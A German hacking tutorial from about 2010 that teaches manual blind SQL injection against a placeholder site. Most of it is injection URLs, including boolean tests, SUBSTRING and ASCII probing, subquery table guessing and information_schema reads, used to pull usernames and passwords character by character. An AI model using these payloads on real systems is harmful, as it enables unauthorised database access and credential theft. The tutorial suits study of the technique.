[German] Blind SQL Injection ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******************************************************* # WEBSECURITY DOCUMENTATION # # -------------------------------------- # # Blind SQL Injection # # -------------------------------------- # # # # # # written by fred777 [fred777.5x.to # # # ****************************************************** ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[0x00]-- Intro --[0x01]-- Knowledge [1] Vuln Check [2] Blind --[0x02]-- Exploiting [1] Substring [2] Subqueries [3] ASCII [4] Werte auslesen [5] CHAR [6] HEX [7] Information_schema --[0x03]-- Finito ******************************************************** ################################################## --[0x00]-- Intro Willkommen zu einem weiteren Tutorial über SQL-Injections von mir. Diesmal wird es um Blind Injections gehen. Wir werden hier alles von Hand machen, doch zwingt euch keiner nicht einfach Scripte zur Hand zu nehmen. ########################################################### --[0x01]-- Knowledge Bis jetzt hatten wir immer eine Ausgabe, wir verbanden den SELECT-Query mittels UNION mit unserem SELECT-Query und killten das Resultat auf eine leere Menge, meistens mit einem - oder einer nicht existierenden Zahl. Nun finden wir wieder einen Bug, welcher den Anschein erweckt, dass sich der Query manipulieren lässt. ------------------------------------------------------- [1] Vuln Check ------------------------------------------------------- www.seite.de/index.php?id=777 => Alles wird normal dargestellt www.seite.de/index.php?id=777' => Die Seite wird nicht korrekt dargestellt Man sollte bedenken, dass nicht in allen dieser Fälle eine Lücke besteht, das müssen wir ebenfalls erst testen und zwar mittels eines Tricks, wir stellen dem Query eine mathematische Aufgabe, geht er darauf ein und beantwortet diese ist er manipulierbar, ansonsten sollte keine Lücke vorhanden sein. Die einfachste Aufgabe wird wohl sein 1=1, natürlich ist das wahr, also true, 1=0 ist falsch, also false mit AND hängen wir unsere Aufgabe an den Query dran, das sollten wir noch aus Paper 1 kennen: www.seite.de/index.php?id=777 and 1=1 => Alles wird korrekt dargestellt www.seite.de/index.php?id=777 and 1=0 => Die Seite wird nicht korrekt dargestellt Aha, der Query ist auf unsere Aufgabe eingegangen und hat mit "ja" und "nein" geantwortet. Wo ich Leerzeichen verwenden, könnt ihr auch + oder /**/ verwenden, nebenbei könnte es sein, dass ihr unnötigen Rest vom ersten Query entfernen müsst, dass könnt ihr mit einem Comment machen, Je nach Query könnt es ebenfalls sein, dass ihr bei AND 1=1 das Hochkomma beibehalten müsst, also: www.seite.de/index.php?id=777' and 1=1-- f Es heißt hier einfach ausprobieren, es sei denn euch liegen die Scripte vor, dann könnt ihr euch die Datenbankabfrage anschauen. ------------------------------------------------------- [2] Blind ------------------------------------------------------- Wie sind wir bisher vorgegangen, genau, wir haben mit ORDER BY die Columns gecheckt, also los www.seite.de/index.php?id=777 order by 1 => Seite wird richtig dargestellt www.seite.de/index.php?id=777 order by 7 => Seite wird richtig dargestellt www.seite.de/index.php?id=777 order by 8 => Seite wird fehlerhaft dargestellt Nun kennen wir auch schon das Spiel mit UNION und SELECT... www.seite.de/index.php?id=777 union select 1,2,3,4,5,6,7-- f Doch was ist das? Es erfolgt keine Ausgabe, auch wenn wir das Resultat des ersten Querys ungültig machen: www.seite.de/index.php?id=-657567567777 union select 1,2,3,4,5,6,7-- f Jetzt sind wir an dem Punkt uns einen neuen Weg zu überlegen, erinnern wir uns nochmal an unsere Rechenaufgabe, da hat der Query reagiert, könnten wir dann nicht auch fragen, ob das PW des Users mit A, oder O anfängt? ################################################################## --[0x02]-- Exploiting Richtig, und genau das werden wir versuchen, wir können wie auch bei einer normalen Injection, falls die MySQL-Version 5 beträgt auf die Information_schema zugreifen, falls es Version 4 ist, müssen wir eben raten, das auslesen aus information_schema mittels Blind kann sehr aufwendig werden, deshalb werden gerne Scripte benutzt. ------------------------------------------------------- [1] Substring ------------------------------------------------------- Um auf diese Art Werte auszulesen, benutzen wir eine neue Funktion, SUBSTRING: Der Syntax lautet: SUBSTRING(stringoderwort,start,länge) stringoderwort ist unser String, start bestimmt die Rückgabe des ersten Wertes und länge bestimmt wieviele Werte zurückgegeben werden ab start. Uns würde also ausgegeben bei SUBSTRING(stringoderwort,4,3) => ing Nun, so können wir auch die Version bestimmen, sie fängt entwedern mit 4.x.x.x oder mit 5.x.x.x an Also sagen wir, dass wir nur den ersten Wert haben möchte, da dieser entscheidend ist, die Version liegt wie wir wissen unter 'version()' und die Abfrage gestalten wir wie vorher mit AND: AND SUBSTRING(version(),1,1)=5 www.seite.de/index.php?id=777 AND SUBSTRING(version(),1,1)=4 => Seite wird nicht normal dargestellt www.seite.de/index.php?id=777 AND SUBSTRING(version(),1,1)=5 => Seite wird normal dargestellt Aha, folglich ist der erste Wert von version() eine 5 und somit können wir auf die information_schema zugreifen.. ------------------------------------------------------- [2] Subqueries ------------------------------------------------------- Wie bei einer normalen Injection auch, möchten wir den User aus der Usertable haben. Da wir sowieso mit Version 5 arbeiten, könnten wir die Information_schema Datenbank nutzen, was sehr lange dauern kann, oder wir fragen erstmal auf Gutglück, ob einige Namen existieren, wie die Table 'users' z.B. Dafür können wir Subqueries benutzen, d.h. wir fragen ob es wenn wir von der Table users etwas auswählen true ergibt, dafür benutzen wir einen Query und setzen ihn gleich 1 (true). Wie bei der Mathematik werden Klammern benutzt. Wichtig, dies geht nur bei Version 4.1 oder größer. Bei älteren Versionen müsste man mit Timecheck wie z.B. Benchmark arbeiten, was wesentlich komplizierter ist. Ich werde es wahrscheinlich im nächsten Paper zeigen. Nun aber zum Thema, erstmal testen wir es mit select, sollte select nicht funktionieren, steht false gegen true und ist somit invalid. www.seite.de/index.php?id=777 and (select 1)=1 => Seite wird normal dargestellt Somit können wir mit einem subselect schonmal arbeiten, select 1 ist true und wird mit 1 verglichen, was ebenfalls true ergibt. www.seite.de/index.php?id=777 and (select 1 from user limit 0,1)=1 => Seite wird nicht richtig dargestellt Also gibt es die Table 'user' schonmal nicht, versuchen wir es mit users: Wichtig: limit ist hier erforderlich, da es sich um einen Subquery handelt, dieser gibt kann nur einen Wert zurückgegeben, deshalb beschränken wir es auf limit 0,1! www.seite.de/index.php?id=777 and (select 1 from users limit 0,1)=1 => Seite wird richtig dargestellt Oh, users existiert schonmal, fehlen noch die zugehörigen Columns, schauen wir weiter, natürlich könntet ihr jetzt auch mit WHERE und information_schema arbeiten: www.seite.de/index.php?id=777 and (select substring(password,1,1) from users limit 0,1)=1 => Seite wird nicht richtig dargestellt www.seite.de/index.php?id=777 and (select substring(pass,1,1) from users limit 0,1)=1 => Seite wird richtig dargestellt www.seite.de/index.php?id=777 and (select substring(user,1,1) from users limit 0,1)=1 => Seite wird nicht richtig dargestellt www.seite.de/index.php?id=777 and (select substring(username,1,1) from users limit 0,1)=1 => Seite wird richtig dargestellt Ok, somit hätten wir durch raten die Table und die Columns, es ist zwar Version 5, doch ohne Script aus information_schema lesen ist sehr langwierig. Ich gehe später darauf ein, wie man es bei Bedarf trotzdem machen könnte. ------------------------------------------------------- [3] ASCII ------------------------------------------------------- Nun, da wir die Namen der Tables und Columns haben, starten wir einen normalen Query mittels Substring, jetzt werden wir Wert für Wert auslesen und nicht mehr testen ob es nur existiert oder nicht. Fangen wir mit 'username' an. ------------------------ Wir werden beim Auslesen mit ASCII arbeiten, HEX ginge zwar auch, doch so finde ich es leichter.. ASCII ist eine Zeichencodierungsform welche mit 7 Bits arbeitet, für weitere Informationen, bitte selber Googlen. Was wir brauchen werden ist eine ASCII-Tabelle, um die ausgelesenen ASCII-Werte in unsere Zeichen umrechnet, so wie z.B. diese: http://www.torsten-horn.de/techdocs/ascii.htm So ist z.B. der ASCII-Wert 97 ein a ------------------------ Wir werden den ersten Wert des usernames jetzt auslesen, damit wir ascii-zeichen bekommen, benutzen wir ascii: ASCII() Nun brauchen wir für username unseren substring, welcher in ascii() hineinkommt, da wir jedes Zeichen einzeln auslesen werden. ascii(SUBSTRING()) Nun selektieren wir username: ascii(substring((SELECT username FROM users LIMIT 0,1),1,1)) Und zu letzt vergleichen wir mit unserem true/false-Verfahren das Resultat mit einem ASCII-Wert Hierfür können wir >,< und = benutzen, wir fangen mit >1 an, da es immer true ergibt ------------------------------------------------------- [4] Werte auslesen ------------------------------------------------------- www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),1,1))>1-- f => true Wir fragen also, ob der ersten Buchstabe vom ersten User aus 'users' größer ist als Ascii 1 Jetzt gehen wir höher und grenzen den Bereich ein: www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),1,1))>100-- f => false, er ist nicht größer www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),1,1))>96-- f => true, er ist größer www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),1,1))<97-- f => false, er ist nicht kleiner als 97 www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),1,1))=97-- f => true, er ist gleich 97 Rechnen wir schnell um, ein a, also ist der erste Buchstabe vom username ein a Wenn ihr den zweiten auslesen wollt, fangt ihr bei der zweiten Stelle an, bleibt aber bei der Länge 1, so macht ihr per Hand weiter, bis der ASCII-Wert unter 32 liegt, hier kommen die Steuerzeichen und der String ist zu Ende. www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),2,1))>100-- f www.seite.de/index.php?id=777 and ascii(substring((SELECT username FROM users LIMIT 0,1),6,1))=31-- f => true, der String ist zu Ende Der username heißt admin. Das Gleiche macht ihr mit dem Passwort: www.seite.de/index.php?id=777 and ascii(substring((SELECT pass FROM users LIMIT 0,1),1,1))>100-- f => false, er ist nicht größer ------------------------------------------------------- [5] CHAR ------------------------------------------------------- Eine andere Möglichkeit währe, anstatt ascii() die Funktion char() zu benutzen, das sähe dann so aus: www.seite.de/index.php?id=777 and substring((SELECT pass FROM users LIMIT 0,1),1,1)>char(100)-- f => false, er ist nicht größer ------------------------------------------------------- [6] HEX ------------------------------------------------------- Auch mittels hex Codierung ist es kein Problem. Der Buchstabe wird simple in Hex umgewandelt. www.seite.de/index.php?id=777 and substring((SELECT pass FROM users LIMIT 0,1),1,1)=0x41-- f => false, falls nicht 'A' ------------------------------------------------------- [7] Information_schema ------------------------------------------------------- So, wenn ihr aus der Information_schema table auslesen wollt, geht das genauso: www.seite.de/index.php?id=777 and ascii(substring((select schema_name from information_schema.schemata limit 0,1),1,1))>1 Schemata für Datenbanken www.seite.de/index.php?id=777 and ascii(substring((select table_name from information_schema.columns limit 0,1),1,1))>1 Table_name für Columns www.seite.de/index.php?id=777 and ascii(substring((select column_name from information_schema.columns limit 0,1),1,1))>1 Column_name für Columns #################################################################################### --[0x03]-- Finito Ok, das wars auch schon wieder, ich hoffe ich habe nichts vergessen zu erklären, und falls Fortgeschrittene sich fragen was mit ifnull() oder if() ist, das erkläre ich in einem anderen Paper.. fred777.5x.to © Offensive Security 2010